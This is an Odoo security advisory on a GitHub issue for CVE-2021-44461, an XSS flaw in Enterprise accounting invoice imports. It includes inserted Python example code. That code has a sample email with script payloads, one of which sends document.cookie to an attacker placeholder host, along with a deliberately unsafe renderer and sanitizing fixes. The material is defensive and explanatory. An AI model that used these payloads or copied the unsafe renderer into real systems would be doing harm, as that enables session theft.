[SEC] CVE-2021-44461 - Cross-site scripting (XSS) issue in Accountin... #107686

Closed
odony opened this issue Dec 10, 2022 · 0 comments
Labels
Security security announcements

odony commented Dec 10, 2022

Security Advisory - CVE-2021-44461

Affects: Odoo 13.0 to 15.0 (Enterprise Edition)
CVE ID: CVE-2021-44461
Component: Accounting (account_accountant)

Cross-site scripting (XSS) issue in Accounting app of Odoo Enterprise 13.0
through 15.0, allows remote attackers who are able to control the contents
of accounting journal entries to inject arbitrary web script in the browser
of a victim.

I. Background

The Odoo accounting application allows external users to send invoices by email
that are automatically imported into an Odoo database.

II. Problem Description

The content of the imported invoice was not properly sanitized before being displayed to the accountant.

III. Impact

Attack Vector: Network exploitable
Authentication: None
CVSS3 Score: Medium :: 6.5
CVSS3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

A malicious user could send a crafted invoice and trigger injected web script
code when an accountant opens the invoice.

Odoo S.A. is not aware of any use of this vulnerability in the wild.
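Added illustration of the bug class described in sections I to III (this is example code written for this page, not Odoo's code and not the patch referenced below): a hypothetical email-to-invoice import whose rendering step trusts the message content, shown beside two hardened variants. The function and class names (import_invoice, render_invoice_unsafe, render_invoice_safe, AllowListSanitizer, sanitize_rich_text) and the sample email are constructed for this example; the advisory does not say which field or view was affected, so the exact location of the real flaw is an assumption here.

```python
"""Email-to-invoice import with an XSS-prone and two hardened renderers.
Illustrative only: names, fields and the sample message are invented."""
import html
from email import message_from_string
from html.parser import HTMLParser

# Constructed sample: an attacker-controlled "invoice" email whose subject and
# body carry script payloads. Addresses use the reserved .invalid TLD.
MALICIOUS_EMAIL = """\
From: vendor@example.invalid
To: invoices@example.invalid
Subject: Invoice 2022-017 <img src=x onerror=alert(document.cookie)>
Content-Type: text/plain; charset=utf-8

Payment for services.
<script>fetch('https://attacker.invalid/?c='+document.cookie)</script>
Total due: 1200.00 EUR
"""


def import_invoice(raw_email: str) -> dict:
    """Parse an incoming email into a vendor-bill record, as a mail gateway
    would. Storing the raw text is fine; the mistake is rendering it later
    as markup without escaping."""
    msg = message_from_string(raw_email)
    return {
        "vendor": msg["From"],
        "reference": msg["Subject"],
        "narration": msg.get_payload(),  # single-part message -> str
    }


def render_invoice_unsafe(inv: dict) -> str:
    """Vulnerable rendering: untrusted fields are concatenated straight into
    HTML, so the attacker's tags execute in the accountant's browser."""
    return (f"<h2>{inv['reference']}</h2>"
            f"<p>From: {inv['vendor']}</p>"
            f"<div class='narration'>{inv['narration']}</div>")


def render_invoice_safe(inv: dict) -> str:
    """Hardened rendering for plain-text fields: every untrusted value is
    HTML-escaped, so '<', '>', quotes and '&' become entities and can no
    longer open a tag or an attribute."""
    e = html.escape
    return (f"<h2>{e(inv['reference'])}</h2>"
            f"<p>From: {e(inv['vendor'])}</p>"
            f"<div class='narration'>{e(inv['narration'])}</div>")


class AllowListSanitizer(HTMLParser):
    """Minimal allow-list sanitizer for fields that legitimately carry rich
    text (e.g. an HTML email body): keeps a few formatting tags, drops every
    attribute (so no onerror=, no href=javascript:) and escapes all text.
    Shown to make the control visible; in production use a maintained
    sanitizer library rather than this toy."""
    ALLOWED = {"p", "br", "b", "i", "ul", "li"}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag in self.ALLOWED:          # attributes are always discarded
            self.out.append(f"<{tag}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in self.ALLOWED and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text inside <script> also arrives here and is escaped to inert text.
        self.out.append(html.escape(data))

    def result(self) -> str:
        return "".join(self.out)


def sanitize_rich_text(untrusted_html: str) -> str:
    """Return untrusted_html reduced to the allow-listed tags and escaped text."""
    p = AllowListSanitizer()
    p.feed(untrusted_html)
    p.close()
    return p.result()


if __name__ == "__main__":
    bill = import_invoice(MALICIOUS_EMAIL)
    print("UNSAFE:", render_invoice_unsafe(bill))
    print("SAFE:  ", render_invoice_safe(bill))
    print("RICH:  ", sanitize_rich_text(bill["narration"]))
```

The escaping variant is the right fix when a field is plain text; the allow-list variant is for fields that must keep some formatting. Both treat the email content as data from an unauthenticated network sender, which is exactly the PR:N / UI:R situation the CVSS vector above describes.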

IV. Workaround

No workaround is available; updating to the latest revision or applying the
corresponding patch is strongly recommended.

Odoo Cloud servers were patched as soon as the correction was available.

V. Solution

Update to the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
If updating is not an option, you may instead apply the patch corresponding
to your Odoo installation (links provided below).

For the actual update procedure, please refer to our update instructions, valid
for all versions: https://www.odoo.com/documentation/15.0/setup/update.html

VI. Correction details

The following list contains the patches that fix the vulnerability for
each version:

@odony odony closed this as completed Dec 10, 2022
@odoo odoo locked and limited conversation to collaborators Dec 10, 2022